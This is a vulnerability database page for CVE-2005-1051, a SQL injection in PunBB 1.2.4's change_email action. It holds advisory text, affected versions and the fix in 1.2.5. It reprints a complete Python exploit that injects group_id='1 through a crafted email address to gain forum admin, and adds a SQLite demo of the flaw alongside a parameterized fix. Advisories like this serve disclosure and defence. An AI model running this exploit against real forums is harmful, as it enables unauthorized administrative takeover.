CVE-2005-1051
CVSS 6.5
Published: 2005-05-02 00:00:00
Revised: 2016-10-17 23:16:56

[Original] SQL injection vulnerability in profile.php in PunBB 1.2.4 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a change_email action.


[CNNVD] PunBB profile.php Remote SQL Injection Vulnerability (CNNVD-200505-662)

PunBB is a PHP-based forum application.
PunBB contains a SQL injection vulnerability; a remote attacker may gain unauthorized access to the database.
The cause is that the profile.php script does not properly validate user-supplied input before using it in a SQL query. An attacker can exploit this vulnerability to gain administrative access to a vulnerable forum.
        

- CVSS (Base Score)

CVSS score: 6.5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:punbb:punbb:1.0_rc1
cpe:/a:punbb:punbb:1.0_rc2
cpe:/a:punbb:punbb:1.1
cpe:/a:punbb:punbb:1.0
cpe:/a:punbb:punbb:1.1.2
cpe:/a:punbb:punbb:1.2.1
cpe:/a:punbb:punbb:1.0_alpha
cpe:/a:punbb:punbb:1.1.3
cpe:/a:punbb:punbb:1.2.2
cpe:/a:punbb:punbb:1.1.4
cpe:/a:punbb:punbb:1.2.3
cpe:/a:punbb:punbb:1.1.5
cpe:/a:punbb:punbb:1.2.4
cpe:/a:punbb:punbb:1.0_beta1
cpe:/a:punbb:punbb:1.0.1
cpe:/a:punbb:punbb:1.0_beta2
cpe:/a:punbb:punbb:1.0_beta3
cpe:/a:punbb:punbb:1.1.1

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1051
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1051
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-662
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=111306207306155&w=2
(UNKNOWN)  BUGTRAQ  20050408 PunBB <= 1.2.4 - change email to become admin exploit
http://www.securityfocus.com/bid/13071
(PATCH)  BID  13071

- Vulnerability Information

PunBB profile.php Remote SQL Injection Vulnerability
Medium  SQL injection
2005-05-02 00:00:00 2006-02-13 00:00:00
Remote

- Advisory and Patches

The vendor has not yet provided a patch or upgrade; users of this software are advised to monitor the vendor's homepage for the latest version:
http://www.punbb.org/

- Vulnerability Information (928)

PunBB 1.2.4 (change_email) SQL Injection Exploit (EDBID:928)
php webapps
2005-04-11 Verified
0 Stefan Esser
N/A
#!/usr/bin/python
#######################################################################
#  _  _                _                     _       ___  _  _  ___
# | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
# |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|
#
#######################################################################
#         Proof of concept code from the Hardened-PHP Project
#######################################################################
#
#                           -= PunBB 1.2.4 =-
#                   change_email SQL injection exploit
#
#  user-supplied data within the database is still user-supplied data
#
#######################################################################

import urllib
import getopt
import sys
import string

__argv__ = sys.argv

def banner():
   print "PunBB 1.2.4 - change_email SQL injection exploit"
   print "Copyright (C) 2005 Hardened-PHP Project\n"

def usage():
   banner()
   print "Usage:\n"
   print "   $ ./punbb_change_email.py [options]\n"
   print "        -h http_url   url of the punBB forum to exploit"
   print "                      f.e. http://www.forum.net/punBB/"
   print "        -u username   punBB forum useraccount"
   print "        -p password   punBB forum userpassword"
   print "        -e email      email address where the admin level activation email is sent"
   print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails"
   print ""
   sys.exit(-1)

def main():
   try:
       opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
   except getopt.GetoptError:
       usage()

   if len(__argv__) < 10:
       usage()

   username = None
   password = None
   email = None
   domain = None
   host = None
   for o, arg in opts:
       if o == "-h":
           host = arg
       if o == "-u":
           username = arg
       if o == "-p":
           password = arg
       if o == "-e":
           email = arg
       if o == "-d":
           domain = arg

   # Printout banner
   banner()

   # Check if everything we need is there
   if host == None:
       print "[-] need a host to connect to"
       sys.exit(-1)
   if username == None:
       print "[-] username needed to continue"
       sys.exit(-1)
   if password == None:
       print "[-] password needed to continue"
       sys.exit(-1)
   if email == None:
       print "[-] email address needed to continue"
       sys.exit(-1)
   if domain == None:
       print "[-] catch all domain needed to continue"
       sys.exit(-1)

   # Retrieve cookie
   params = {
       'req_username' : username,
       'req_password' : password,
       'form_sent' : 1
   }

   wclient = urllib.URLopener()

   print "[+] Connecting to retrieve cookie"

   req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
   info = req.info()
   if 'set-cookie' not in info:
       print "[-] Unable to retrieve cookie... something is wrong"
       sys.exit(-3)
   cookie = info['set-cookie']
   cookie = cookie[:string.find(cookie, ';')]
   print "[+] Cookie found - extracting user_id"
   user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
   print "[+] User-ID: %d" % (int(user_id))
   wclient.addheader('Cookie', cookie)

   email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
   append = 'group_id=\'1'
   email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain

   params = {
       'req_new_email' : email,
       'form_sent' : 1
   }

   print "[+] Connecting to request change email"
   req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))

   print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"

if __name__ == "__main__":
   main()

# milw0rm.com [2005-04-11]

- Vulnerability Information

15372
PunBB profile.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability Description

PunBB contains a flaw that may allow an attacker to inject arbitrary SQL queries. The issue is due to the 'id' variables in the profile.php script not being properly sanitized and may allow an attacker to inject or manipulate SQL queries.

- Timeline

2005-04-07 Unknown
2005-04-11 Unknown

- Solution

Upgrade to version 1.2.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

- Vulnerability Information

PunBB Profile.PHP SQL Injection Vulnerability
Input Validation Error 13071
Yes No
2005-04-08 12:00:00 2009-07-12 12:56:00
The researcher responsible for discovering this issue is unknown at the moment.

- Affected Versions

PunBB PunBB 1.2.4
PunBB PunBB 1.2.3
PunBB PunBB 1.2.2
PunBB PunBB 1.2.1
PunBB PunBB 1.1.5
PunBB PunBB 1.1.4
PunBB PunBB 1.1.3
PunBB PunBB 1.1.2
PunBB PunBB 1.1.1
PunBB PunBB 1.1
PunBB PunBB 1.0.1
PunBB PunBB 1.0 RC2
PunBB PunBB 1.0 RC1
PunBB PunBB 1.0 _beta3
PunBB PunBB 1.0 _beta2
PunBB PunBB 1.0 _beta1
PunBB PunBB 1.0 _alpha
PunBB PunBB 1.0
PunBB PunBB 1.2.5

- Unaffected Versions

PunBB PunBB 1.2.5

- Vulnerability Discussion

PunBB is affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input through the 'profile.php' script before using it in a SQL query.

This issue can be successfully exploited to gain administrative access to a vulnerable forum.

PunBB 1.2.4 and prior versions are vulnerable.
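The discussion above, together with the PoC banner line "user-supplied data within the database is still user-supplied data", describes a second-order injection: a value that was stored safely is later read back and concatenated into a new query. The following is an added example, not PunBB's own code (the table, column names and group numbers are assumptions), that reproduces the change-email-then-activate flow against an in-memory SQLite table and shows the parameterized activation that closes it.

```python
import sqlite3

# Constructed stand-in for a forum users table; an illustration, not PunBB's
# real schema. Group numbers are assumptions for the demo.
ADMIN_GROUP = 1
MEMBER_GROUP = 4


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, group_id INTEGER)")
    db.execute("INSERT INTO users VALUES (2, 'alice@example.net', ?)", (MEMBER_GROUP,))
    return db


def request_change(db, user_id, new_email):
    # Step 1: the requested address is stored with a bound parameter, so a quote
    # inside it survives intact. Stored safely is not the same as safe to reuse.
    db.execute("UPDATE users SET email = ? WHERE id = ?", (new_email, user_id))


def activate_vulnerable(db, user_id):
    # Step 2 (flawed): the stored value is read back and concatenated into SQL.
    # A quote in it closes the string early, and the remainder becomes an extra
    # column assignment inside the same UPDATE statement.
    (email,) = db.execute("SELECT email FROM users WHERE id = ?", (user_id,)).fetchone()
    db.execute("UPDATE users SET email = '" + email + "' WHERE id = " + str(user_id))


def activate_fixed(db, user_id):
    # Step 2 (hardened): the same value is bound as a parameter and stays data.
    (email,) = db.execute("SELECT email FROM users WHERE id = ?", (user_id,)).fetchone()
    db.execute("UPDATE users SET email = ? WHERE id = ?", (email, user_id))


def group_of(db, user_id):
    return db.execute("SELECT group_id FROM users WHERE id = ?", (user_id,)).fetchone()[0]


# Constructed sample: a stored address that contains a single quote. How the
# original PoC got such a value past the address check is a separate matter;
# here it is simply placed in the row to show what happens on reuse.
SAMPLE = "\"alice\"@example.net', group_id='" + str(ADMIN_GROUP)


def demo(activate):
    """Run one change-email + activation flow; return the user's group afterwards."""
    db = make_db()
    request_change(db, 2, SAMPLE)
    activate(db, 2)
    return group_of(db, 2)


if __name__ == "__main__":
    print("concatenated activation  ->", demo(activate_vulnerable))  # 1 (admin)
    print("parameterized activation ->", demo(activate_fixed))       # 4 (member)
```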

- Exploit

No exploit is required.

The following proof of concept allowing the attacker to gain administrative access was provided by Hardened-PHP Project:

- Solution

This issue has been addressed in PunBB 1.2.5.


- References
